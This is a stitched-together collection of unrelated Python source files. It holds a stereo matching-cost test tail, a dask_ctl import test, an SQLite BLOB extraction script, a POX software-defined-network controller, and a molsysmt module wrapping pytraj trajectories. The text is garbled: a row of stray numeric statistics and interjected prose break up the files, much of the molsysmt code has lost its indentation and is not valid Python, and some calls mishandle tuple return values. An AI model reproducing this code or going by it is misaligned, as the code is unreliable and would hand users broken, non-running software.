[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, -1.0],
[np.nan, -1.0, -1.0],
[-1.0, -1.0, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, -1.0, np.nan],
[-1.0, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, -1.0, np.nan],
[-1.0, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
],
dtype=np.float32,
)
matching_cost_ = matching_cost.AbstractMatchingCost(
    **{
        "matching_cost_method": "mc_cnn",
        "window_size": 11,
        "subpix": 1,
        "mc_cnn_arch": "fast",
        "model_path": "weights/mc_cnn_fast_mb_weights.pt",
    }
)
cv = matching_cost_.compute_cost_volume(left, right, disp_min=-1, disp_max=1)
# Check that the computed cost volume equals the ground truth (same shape, all elements equal)
np.testing.assert_array_equal(cv["cost_volume"].data, cv_before_invali)
# Masked cost volume with pandora function
matching_cost_.cv_masked(left, right, cv, -1, 1)
# Check that the masked cost volume equals the ground truth (same shape, all elements equal)
np.testing.assert_array_equal(cv["cost_volume"].data, cv_ground_truth)
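The comparison above works even though the ground-truth arrays are mostly NaN, because `np.testing.assert_array_equal` treats NaN entries in matching positions as equal. A minimal sketch:

```python
import numpy as np

# NaN == NaN is False elementwise, but assert_array_equal considers
# matching NaN positions equal, so masked cost volumes compare cleanly.
a = np.array([[np.nan, 1.0], [-1.0, np.nan]], dtype=np.float32)
b = np.array([[np.nan, 1.0], [-1.0, np.nan]], dtype=np.float32)

np.testing.assert_array_equal(a, b)
print("arrays match")
```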
if __name__ == "__main__":
    unittest.main()

# dask_ctl/tests/test_dask_ctl.py
def test_import():
    import dask_ctl

    assert dask_ctl

# near-block-chain_output.py
# Retrieve an image and a file stored as BLOBs
import sqlite3, os

def write_to_file(data, filename):
    # Write the binary BLOB data out to a file
    with open(filename, 'wb') as file:
        file.write(data)
    print("BLOB data saved to:", filename, "\n")

def read_blob_data(emp_id, extension):
    # Fetch the record with the given id and save its BLOB column to disk.
    # The four near-identical jpg/png/gif/mp4 readers are collapsed into this
    # one function, parameterized by file extension.
    sqlite_connection = None
    try:
        sqlite_connection = sqlite3.connect('sqlite_python_boobs.db')
        cursor = sqlite_connection.cursor()
        print("Connected to SQLite")
        sql_fetch_blob_query = """SELECT * from new_employee where id = ?"""
        cursor.execute(sql_fetch_blob_query, (emp_id,))
        record = cursor.fetchall()
        for row in record:
            print("Id = ", row[0], "Name = ", row[1])
            name = row[1]
            photo = row[2]
            print("Saving the employee image and resume to disk\n")
            photo_path = os.path.join(name + "." + extension)
            write_to_file(photo, photo_path)
        cursor.close()
    except sqlite3.Error as error:
        print("Error while working with SQLite", error)
    finally:
        if sqlite_connection:
            sqlite_connection.close()
            print("SQLite connection closed")

read_blob_data(1, "jpg")
read_blob_data(2, "jpg")
read_blob_data(1, "png")
read_blob_data(2, "png")
read_blob_data(3, "gif")
read_blob_data(4, "mp4")
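The parameterized `SELECT ... WHERE id = ?` pattern and BLOB retrieval can be exercised without the on-disk database; this sketch uses an in-memory SQLite database with the `new_employee` schema assumed by the script above:

```python
import sqlite3

# In-memory stand-in for sqlite_python_boobs.db with the assumed
# new_employee schema (id, name, photo BLOB).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE new_employee (id INTEGER PRIMARY KEY, name TEXT, photo BLOB)")
conn.execute("INSERT INTO new_employee VALUES (?, ?, ?)", (1, "alice", b"\x89PNGdata"))

# The same parameterized SELECT returns the BLOB column as bytes.
row = conn.execute("SELECT * FROM new_employee WHERE id = ?", (1,)).fetchone()
print(row[1], row[2][:4])  # → alice b'\x89PNG'
conn.close()
```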

# software-defined-networks/Topo2_Proactive.py
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
"""
Implement a proactive controller for the topology below.

            [c1]
            /  \
           /    \
          /      \
         /        \
      [s1]--------[s2]
      /  \        /  \
   [h1]  [h2]  [h3]  [h4]

[cX] - controller
[sX] - switch
[hX] - host
"""

from pox.core import core
import pox.openflow.libopenflow_01 as of
from pox.lib.util import dpidToStr

__email__ = "i@hsen.tech"
__date__ = "2020/4/1"

log = core.getLogger()

s1_dpid = 0
s2_dpid = 1


def _install_arp_flood(connection):
    """Install a low-priority permanent rule that floods ARP packets."""
    msg = of.ofp_flow_mod()
    msg.priority = 1
    msg.idle_timeout = 0
    msg.hard_timeout = 0
    msg.match.dl_type = 0x0806
    msg.actions.append(of.ofp_action_output(port=of.OFPP_ALL))
    connection.send(msg)


def _install_ip_rule(connection, nw_dst, out_port):
    """Install a permanent rule forwarding IPv4 traffic for nw_dst to out_port."""
    msg = of.ofp_flow_mod()
    msg.priority = 10
    msg.idle_timeout = 0
    msg.hard_timeout = 0
    msg.match.dl_type = 0x0800
    msg.match.nw_dst = nw_dst
    msg.actions.append(of.ofp_action_output(port=out_port))
    connection.send(msg)


def _handle_ConnectionUp(event):
    """Send rules to proactively populate the flow table of each switch."""
    # We have 2 switches
    global s1_dpid
    global s2_dpid

    print "ConnectionUp: ", dpidToStr(event.connection.dpid)

    # Record the dpid of each switch as it connects
    for m in event.connection.features.ports:
        if m.name == "s1-eth1":
            s1_dpid = event.connection.dpid
            print "s1_dpid=", s1_dpid
        elif m.name == "s2-eth1":
            s2_dpid = event.connection.dpid
            print "s2_dpid=", s2_dpid

    if event.connection.dpid == s1_dpid:
        # Rules for s1: h1 on port 1, h2 on port 2, s2 reached via port 3
        _install_arp_flood(event.connection)
        _install_ip_rule(event.connection, "10.0.0.1", 1)
        _install_ip_rule(event.connection, "10.0.0.2", 2)
        _install_ip_rule(event.connection, "10.0.0.3", 3)
        _install_ip_rule(event.connection, "10.0.0.4", 3)
    elif event.connection.dpid == s2_dpid:
        # Rules for s2: h3 on port 1, h4 on port 2, s1 reached via port 3
        _install_arp_flood(event.connection)
        _install_ip_rule(event.connection, "10.0.0.1", 3)
        _install_ip_rule(event.connection, "10.0.0.2", 3)
        _install_ip_rule(event.connection, "10.0.0.3", 1)
        _install_ip_rule(event.connection, "10.0.0.4", 2)


def launch():
    core.openflow.addListenerByName("ConnectionUp", _handle_ConnectionUp)
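The proactive flow rules amount to a static forwarding table per switch. This plain-Python sketch (switch names and the `out_port` helper are illustrative, not part of POX) captures the port assignments installed above:

```python
# Destination IP -> output port, per switch, as installed by the controller.
FORWARDING = {
    "s1": {"10.0.0.1": 1, "10.0.0.2": 2, "10.0.0.3": 3, "10.0.0.4": 3},
    "s2": {"10.0.0.1": 3, "10.0.0.2": 3, "10.0.0.3": 1, "10.0.0.4": 2},
}

def out_port(switch, dst_ip):
    # Look up the egress port a switch uses for a destination host.
    return FORWARDING[switch][dst_ip]

# h1 -> h3 leaves s1 on the inter-switch link (port 3) and s2 on port 1.
print(out_port("s1", "10.0.0.3"), out_port("s2", "10.0.0.3"))  # → 3 1
```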
| 26.335484 | 71 | 0.645272 | 654 | 4,082 | 3.866972 | 0.163609 | 0.039541 | 0.086991 | 0.04745 | 0.740214 | 0.71807 | 0.71807 | 0.71807 | 0.71807 | 0.71807 | 0 | 0.070771 | 0.228074 | 4,082 | 154 | 72 | 26.506494 | 0.731831 | 0.120529 | 0 | 0.772277 | 0 | 0 | 0.042534 | 0 | 0 | 0 | 0.01836 | 0 | 0 | 0 | null | null | 0 | 0.029703 | null | null | 0.029703 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |

# molsysmt/forms/classes/api_pytraj_Trajectory.py
from molsysmt._private_tools.exceptions import *
from molsysmt.forms.common_gets import *
import numpy as np
from pytraj import Trajectory as _pytraj_Trajectory
from molsysmt.molecular_system import molecular_system_components
form_name = 'pytraj.Trajectory'

is_form = {
    _pytraj_Trajectory: form_name,
}

info = ["", ""]

has = molecular_system_components.copy()
for ii in ['elements', 'bonds', 'coordinates', 'box']:
    has[ii] = True
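The `is_form` mapping enables type-based dispatch: the form name of an item is looked up from its concrete class. A minimal sketch of the pattern, with an illustrative placeholder class standing in for `pytraj.Trajectory`:

```python
# Illustrative placeholder class (not the real pytraj type).
class FakeTrajectory:
    pass

is_form = {FakeTrajectory: "pytraj.Trajectory"}

def get_form(item):
    # Map the item's concrete type to its registered form name.
    return is_form[type(item)]

print(get_form(FakeTrajectory()))  # → pytraj.Trajectory
```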
def to_pytraj_Topology(item, molecular_system=None, atom_indices='all', frame_indices='all'):

    from molsysmt.forms.api_pytraj_Topology import to_pytraj_Topology as pytraj_Topology_to_pytraj_Topology

    tmp_item = item.topology
    if molecular_system is not None:
        tmp_molecular_system = molecular_system.combine_with_items(tmp_item)
    else:
        tmp_molecular_system = None
    # Pass the combined molecular system on (the original passed the stale
    # `molecular_system`, leaving `tmp_molecular_system` unused).
    tmp_item, tmp_molecular_system = pytraj_Topology_to_pytraj_Topology(tmp_item, molecular_system=tmp_molecular_system,
            atom_indices=atom_indices, frame_indices=frame_indices, copy_if_all=False)

    return tmp_item, tmp_molecular_system
def to_molsysmt_MolSys(item, molecular_system=None, atom_indices='all', frame_indices='all'):
from molsysmt.native.io.molsys.classes import from_pytraj_Trajectory as pytraj_Topology_to_molsysmt_MolSys
from molsysmt.forms.classes.api_molsysmt_MolSys import to_molsysmt_MolSys as molsysmt_MolSys_to_molsysmt_MolSys
tmp_item, tmp_molecular_system = pytraj_Topology_to_molsysmt_MolSys(item, molecular_system=molecular_system)
tmp_item, tmp_molecular_system = molsysmt_MolSys_to_molsysmt_MolSys(tmp_item, molecular_system=tmp_molecular_system, atom_indices=atom_indices, frame_indices=frame_indices, copy_if_all=False)
return tmp_item, tmp_molecular_system
def to_molsysmt_Topology(item, molecular_system=None, atom_indices='all', frame_indices='all'):
from molsysmt.native.io.topology.classes import from_pytraj_Trajectory as pytraj_Trajectory_to_molsysmt_Topology
from molsysmt.forms.classes.api_molsysmt_Topology import to_molsysmt_Topology as molsysmt_Topology_to_molsysmt_Topology
tmp_item, tmp_molecular_system = pytraj_Trajectory_to_molsysmt_Topology(item, molecular_system=molecular_system)
tmp_item, tmp_molecular_system = molsysmt_Topology_to_molsysmt_Topology(tmp_item,
molecular_system=tmp_molecular_system, atom_indices=atom_indices, frame_indices=frame_indices, copy_if_all=False)
return tmp_item, tmp_molecular_system
def to_molsysmt_Trajectory(item, molecular_system=None, atom_indices='all', frame_indices='all'):
from molsysmt.native.io.trajectory.classes import from_pytraj_Trajectory as pytraj_Trajectory_to_molsysmt_Trajectory
from molsysmt.forms.classes.api_molsysmt_Trajectory import to_molsysmt_Trajectory as molsysmt_Trajectory_to_molsysmt_Trajectory
tmp_item, tmp_molecular_system = pytraj_Trajectory_to_molsysmt_Trajectory(item,
molecular_system=molecular_system)
tmp_item, tmp_molecular_system = molsysmt_Trajectory_to_molsysmt_Trajectory(tmp_item,
molecular_system=tmp_molecular_system, atom_indices=atom_indices, frame_indices=frame_indices, copy_if_all=False)
return tmp_item, tmp_molecular_system
def to_pytraj_Trajectory(item, molecular_system=None, atom_indices='all', frame_indices='all', copy_if_all=True):

    # Use `==` rather than `is` for string value comparison.
    if (atom_indices == 'all') and (frame_indices == 'all'):
        raise NotImplementedError()
    else:
        raise NotImplementedError()
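A note on the sentinel checks used throughout this module: `is` compares object identity, which CPython does not guarantee for equal string values, so `==` is the reliable test for `'all'`-style sentinels:

```python
a = "all"
b = "".join(["a", "ll"])  # equal value, built at runtime as a distinct object

# Equality holds; identity typically does not for runtime-built strings.
print(a == b, a is b)  # → True False
```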
def extract_item(item, atom_indices='all', frame_indices='all'):
raise NotImplementedError()
def add(item, from_item, atom_indices='all', frame_indices='all'):
raise NotImplementedError()
def append_frames(item, step=None, time=None, coordinates=None, box=None):
raise NotImplementedError()
###### Get
## atom
def get_index_from_atom (item, indices='all', frame_indices='all'):
return get_atom_index_from_atom(item, indices=indices, frame_indices=frame_indices)
def get_id_from_atom (item, indices='all', frame_indices='all'):
return get_atom_id_from_atom(item, indices=indices, frame_indices=frame_indices)
def get_name_from_atom (item, indices='all', frame_indices='all'):
return get_atom_name_from_atom(item, indices=indices, frame_indices=frame_indices)
def get_type_from_atom (item, indices='all', frame_indices='all'):
return get_atom_type_from_atom(item, indices=indices, frame_indices=frame_indices)
def get_atom_index_from_atom(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_index_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_id_from_atom(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_id_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_name_from_atom(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_name_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_type_from_atom(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_type_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_index_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_index_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_id_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_id_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_name_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_name_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_type_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_type_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_name_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_name_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_index_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_index_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_id_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_id_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_type_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_type_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_name_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_name_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_index_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_index_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_id_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_id_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_type_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_type_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_index_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_index_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_id_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_id_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_name_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_name_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_type_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_type_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_index_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_index_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_id_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_id_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_name_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_name_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_type_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_type_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_atoms_from_atom(item, indices='all', frame_indices='all'):

    if indices == 'all':
        return get_n_atoms_from_system(item)
    else:
        return indices.shape[0]
def get_n_groups_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_groups_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_components_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_components_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_molecules_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_molecules_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_chains_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_chains_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_entities_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_entities_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_bonded_atoms_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_bonded_atoms_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_bond_index_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_bond_index_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_bonds_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_bonds_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_inner_bond_index_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_inner_bond_index_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_inner_bonded_atoms_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_inner_bonded_atoms_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_inner_bonds_from_atom (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_inner_bonds_from_atom as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_coordinates_from_atom(item, indices='all', frame_indices='all'):

    from simtk import unit  # `unit` was referenced but never imported in the original

    tmp_item = item.xyz * 0.1 * unit.nanometers

    if indices != 'all':
        tmp_item = tmp_item[:, indices, :]
    if frame_indices != 'all':
        tmp_item = tmp_item[frame_indices, :, :]

    return tmp_item
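pytraj reports coordinates in angstroms with shape `(n_frames, n_atoms, 3)`; the factor of 0.1 converts to nanometers before frames and atoms are sliced. A small NumPy sketch of that slicing (fake data, no pytraj needed):

```python
import numpy as np

# Fake trajectory: 2 frames, 5 atoms, xyz in angstroms.
xyz_angstroms = np.ones((2, 5, 3))
xyz_nm = xyz_angstroms * 0.1  # angstrom -> nanometer

frame_indices = [0]
atom_indices = [1, 3]
sel = xyz_nm[frame_indices][:, atom_indices, :]
print(sel.shape)  # → (1, 2, 3)
```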
def get_frame_from_atom(item, indices='all', frame_indices='all'):
tmp_step = get_step_from_system(item, frame_indices=frame_indices)
tmp_time = get_time_from_system(item, frame_indices=frame_indices)
tmp_coordinates = get_coordinates_from_atom(item, indices=indices, frame_indices=frame_indices)
tmp_box = get_box_from_system(item, frame_indices=frame_indices)
return tmp_step, tmp_time, tmp_coordinates, tmp_box
def get_n_frames_from_atom(item, indices='all', frame_indices='all'):

    # Forward the caller's selection instead of hard-coding 'all'.
    return get_n_frames_from_system(item, indices=indices, frame_indices=frame_indices)
def get_form_from_atom(item, indices='all', frame_indices='all'):
return form_name
## group
def get_index_from_group (item, indices='all', frame_indices='all'):
return get_group_index_from_group (item, indices=indices, frame_indices=frame_indices)
def get_id_from_group (item, indices='all', frame_indices='all'):
return get_group_id_from_group (item, indices=indices, frame_indices=frame_indices)
def get_name_from_group (item, indices='all', frame_indices='all'):
return get_group_name_from_group (item, indices=indices, frame_indices=frame_indices)
def get_type_from_group (item, indices='all', frame_indices='all'):
return get_group_type_from_group (item, indices=indices, frame_indices=frame_indices)
def get_atom_index_from_group(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_index_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_id_from_group(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_id_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_name_from_group(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_name_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_type_from_group(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_type_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_index_from_group(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_index_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_id_from_group(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_id_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_name_from_group(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_name_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_type_from_group(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_type_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_name_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_name_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_index_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_index_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_id_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_id_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_type_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_type_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_name_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_name_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_index_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_index_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_id_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_id_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_type_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_type_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_index_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_index_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_id_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_id_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_name_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_name_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_type_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_type_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_index_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_index_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_id_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_id_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_name_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_name_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_type_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_type_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_atoms_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_atoms_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_groups_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_groups_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_components_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_components_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_molecules_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_molecules_from_group as _get
tmp_item = to_pytraj_Topology(item)
